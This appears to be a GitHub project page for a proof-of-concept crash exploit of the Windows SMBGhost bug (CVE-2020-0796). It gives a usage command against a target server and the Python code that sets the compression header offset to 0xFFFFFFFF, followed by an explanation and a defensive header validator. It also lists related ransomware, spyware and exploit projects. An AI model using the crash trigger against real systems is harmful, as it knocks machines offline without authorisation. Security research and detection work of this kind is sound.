eerykitty / Cve 2020 0796 Poc

Licence: mit
PoC for triggering buffer overflow via CVE-2020-0796

Programming Languages

python
139335 projects - #7 most used programming language

Labels

Projects that are alternatives of or similar to Cve 2020 0796 Poc

Exploits
A personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to be used in conjunction with these exploits.
Stars: ✭ 75 (-71.8%)
Mutual labels:  poc
chrome-spyware
Writing Spyware Made Easy - POC spyware Chrome Extension/Server
Stars: ✭ 25 (-90.6%)
Mutual labels:  poc
awesome-list-of-secrets-in-environment-variables
🦄🔒 Awesome list of secrets in environment variables 🖥️
Stars: ✭ 538 (+102.26%)
Mutual labels:  poc
front-end-visual-comparison-tool
🔮🔬Front-End testing tool which can be used to create a side by side visual comparison between your live site and local site.
Stars: ✭ 16 (-93.98%)
Mutual labels:  poc
Phirautee
A proof of concept crypto virus to spread user awareness about attacks and implications of ransomware. Phirautee is written purely using PowerShell and does not require any third-party libraries. This tool steals the information, holds an organisation's data hostage for payments or permanently encrypts/deletes the organisation's data.
Stars: ✭ 96 (-63.91%)
Mutual labels:  poc
Cerberus
A complete Grabber, sending data to a TCP server that you have to host and stocking all in a database.
Stars: ✭ 32 (-87.97%)
Mutual labels:  poc
ARL-NPoC
A framework that combines vulnerability verification and task execution
Stars: ✭ 73 (-72.56%)
Mutual labels:  poc
CVE-2018-7750
an RCE (remote command execution) approach of CVE-2018-7750
Stars: ✭ 18 (-93.23%)
Mutual labels:  poc
CVE-2021-44228-PoC-log4j-bypass-words
🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks
Stars: ✭ 760 (+185.71%)
Mutual labels:  poc
DeepfakeHTTP
DeepfakeHTTP is a web server that uses HTTP dumps as a source for responses.
Stars: ✭ 373 (+40.23%)
Mutual labels:  poc
swisscheese
Exploits for YARA 3.7.1 & 3.8.1
Stars: ✭ 26 (-90.23%)
Mutual labels:  poc
CVE-2022-21907-http.sys
Proof of concept of CVE-2022-21907 Double Free in http.sys driver, triggering a kernel crash on IIS servers
Stars: ✭ 67 (-74.81%)
Mutual labels:  poc
CVE-2021-33766
ProxyToken (CVE-2021-33766) : An Authentication Bypass in Microsoft Exchange Server POC exploit
Stars: ✭ 37 (-86.09%)
Mutual labels:  poc
fake-web-events
Creates a Simulation of Fake Web Events
Stars: ✭ 48 (-81.95%)
Mutual labels:  poc
NSE-scripts
NSE scripts to detect CVE-2020-1350 SIGRED and CVE-2020-0796 SMBGHOST, CVE-2021-21972, proxyshell, CVE-2021-34473
Stars: ✭ 105 (-60.53%)
Mutual labels:  poc
Scripts-Sploits
A number of scripts, POCs and problems solved as pentests move along.
Stars: ✭ 37 (-86.09%)
Mutual labels:  poc
PoC-CVE-2021-41773
No description or website provided.
Stars: ✭ 39 (-85.34%)
Mutual labels:  poc
Tentacle
Tentacle is a POC vulnerability verification and exploit framework. It supports free extension of exploits and uses POC scripts. It supports calls to zoomeye, fofa, shodan and other APIs to perform bulk vulnerability verification for multiple targets.
Stars: ✭ 258 (-3.01%)
Mutual labels:  poc
Exploit-Development
Exploit Development - Weaponized Exploit and Proof of Concepts (PoC)
Stars: ✭ 84 (-68.42%)
Mutual labels:  poc
Pentesting
Misc. Public Reports of Penetration Testing and Security Audits.
Stars: ✭ 24 (-90.98%)
Mutual labels:  poc

CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost

Usage

./CVE-2020-0796.py servername

This script connects to the target host and sends a compressed authentication request whose transform header carries an out-of-range offset field, causing the decompressor on the target to overflow its buffer and crash the machine.

This repository contains a modified copy of the excellent smbprotocol library with added support for SMB 3.1.1 compression/decompression (LZNT1 only). Most of the additions are in smbprotocol/connection.py. A copy of lznt1 is included, modified to support Python 3.

The compression transform header is implemented by the SMB2CompressionTransformHeader class in that file. The _compress function is called to compress tree requests; this is where the offset field is set to its maximum value (all bits set) to trigger the crash.

    def _compress(self, b_data, session):
        # Build the SMB2 compression transform header for the outgoing message.
        header = SMB2CompressionTransformHeader()
        header['original_size'] = len(b_data)
        # 0xFFFFFFFF: the out-of-range offset value that the target never bounds-checks.
        header['offset'] = 4294967295
        header['data'] = smbprotocol.lznt1.compress(b_data)
        # Hand the populated header back so the caller can pack and send it.
        return header

About

CVE-2020-0796 is a bug in the new SMB3 compression capability of Windows 10 1903/1909. SMB protocol version 3.1.1 introduces the ability for a client or server to advertise compression capabilities and to selectively compress SMB3 messages where beneficial. To accomplish this, when negotiating an SMB session, the client and server must both include an SMB2_COMPRESSION_CAPABILITIES negotiate context, as documented in MS-SMB2 2.2.3.1.3.

Once a session is negotiated with this capability, either the client or the server can selectively compress certain SMB messages. To do so, the entire SMB packet is compressed and a compression transform header is prepended, as documented in MS-SMB2 2.2.42. This header is a small (16-byte) structure containing a magic value, the uncompressed data size, the compression algorithm used, and an offset value.

CVE-2020-0796 is caused by a lack of bounds checking on that offset field, which is passed directly to several subroutines. Passing in a large value causes a buffer overflow and crashes the kernel. With further work, this could be developed into an RCE exploit.
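As an added example (not code from the PoC repository or from smbprotocol), the following validator parses the 16-byte transform header described above and applies the bounds checks that the vulnerable decompressor omitted, which is what a packet filter, IDS rule or hardened decompressor needs to reject a message like the one this PoC sends. The field layout and the LZNT1 algorithm id 0x0001 follow MS-SMB2 2.2.42; the sample messages are constructed inline.

```python
import struct

# Layout of SMB2_COMPRESSION_TRANSFORM_HEADER (MS-SMB2 2.2.42), 16 bytes, little-endian:
#   ProtocolId (4) | OriginalCompressedSegmentSize (4) | CompressionAlgorithm (2)
#   | Flags (2) | Offset (4)
HEADER_FMT = "<4sIHHI"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 16
PROTOCOL_ID = b"\xfcSMB"   # magic value 0xFC 'S' 'M' 'B'
LZNT1 = 0x0001             # the only algorithm the PoC's smbprotocol fork supports
U32_MAX = 0xFFFFFFFF


def build_compressed_message(compressed, original_size, offset, algo=LZNT1):
    """Constructed sample input: a transform header followed by the compressed bytes."""
    return struct.pack(HEADER_FMT, PROTOCOL_ID, original_size, algo, 0, offset) + compressed


def check_transform_header(message):
    """Bounds-check a compressed SMB2 message before it reaches a decompressor.

    Returns (ok, reason). The Offset checks are the ones the vulnerable
    decompressor skipped; the PoC sends Offset = 0xFFFFFFFF.
    """
    if len(message) < HEADER_LEN:
        return False, "message shorter than the 16-byte transform header"
    proto, orig_size, algo, flags, offset = struct.unpack_from(HEADER_FMT, message, 0)
    if proto != PROTOCOL_ID:
        return False, "bad ProtocolId %r" % proto
    if algo != LZNT1:
        return False, "unexpected CompressionAlgorithm 0x%04x" % algo
    payload_len = len(message) - HEADER_LEN
    # Offset counts the uncompressed bytes that sit between this header and the
    # compressed data, so it can never legitimately exceed what was received.
    if offset > payload_len:
        return False, "Offset %d exceeds the %d-byte payload" % (offset, payload_len)
    # The decompressed buffer is sized from these two fields; a 32-bit sum that
    # wraps around would yield an undersized buffer.
    if orig_size + offset > U32_MAX:
        return False, "OriginalCompressedSegmentSize + Offset overflows 32 bits"
    return True, "ok"
```

A benign message with Offset 0 passes, while the PoC-style header with Offset 0xFFFFFFFF is rejected at the payload-length check before any decompression happens.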
